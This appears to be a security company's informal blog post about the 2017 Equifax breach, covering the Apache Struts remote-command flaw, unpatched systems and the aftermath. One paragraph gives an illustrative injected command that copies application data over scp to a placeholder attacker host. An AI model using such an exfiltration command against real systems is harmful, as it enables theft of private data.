As the dust begins to settle on one of the biggest and certainly most significant data breaches in history, sordid details are emerging about the specifics.
Way back in March 2017 a bug was found in the Apache open-source model-view-controller (MVC) web application framework. An MVC divides a (typically) web application into three parts (no prizes for guessing which three parts). Interactions between the parts can be tightly defined allowing code reuse and portability.
Anyhow the Apache MVC implementation is called Struts and the bug allowed attackers to execute arbitrary commands on target systems by simply putting a ‘#cmd=’ in a HTTP request, maybe something like ‘#cmd=scp /SecretApp/data/* guest@MyEvilHost:/mwahaha/’. Simples.
Since Struts is embedded in a plethora of web applications, including the web interfaces for lots of infrastructure equipment like routers and err firewalls, this was a big deal and many long suffering, under appreciated and definitely underpaid admins toiled day and night to identify vulnerable systems and prioritise patching in line with the risk, for instance patching web facing systems first.
That is, or so it would appear, excluding the sysadmins or third party management at Equifax (hands up who thinks a third party will get the blame?) who apparently left critical systems unpatched. The rest, as they say is history.
Beginning in mid May (just the two months after the bug was announced), discovered in July (that must have been a buttock clenching discovery for the Equifax admins eh?) and announced to the world a further two months later, the data of 143 meeelion people was nicked, including 44 million UK customers. Whoops indeed.
We all know these things come in threes. Equifax’s systems have been crashing under the strain of users frantically trying to freeze their credit ratings, and according to the venerable Mr Brian Krebs an online portal for Equifax’s Argentinian employees was discovered to be protected by a default username and password.
When will it end? Well the US Federal Trade Commission is looking into the whole debacle, so the jury is out, so to speak.
We have been discussing if this outbreak will force government intervention and regulation into sites and businesses that hold personal data, it is after all the job of a government to protect its citizens from harm, like violence, war and weather, isn’t it?
If you think you have been affected by the Equifax breach and you should probably assume you have been, there are some things you can do. They are summarised very nicely by the fine folk at Sophos here.
While we are on the subject of urgent patches, if you missed the regular Microsoft patches, they fixed a biggy this month that is being used in the wild. You know what to do, don’t Equifax it up.
If you would like to have a little cry about your credit details being stolen or talk about anything related to information security, please contact us at: firstname.lastname@example.org or call 020 7517 3900.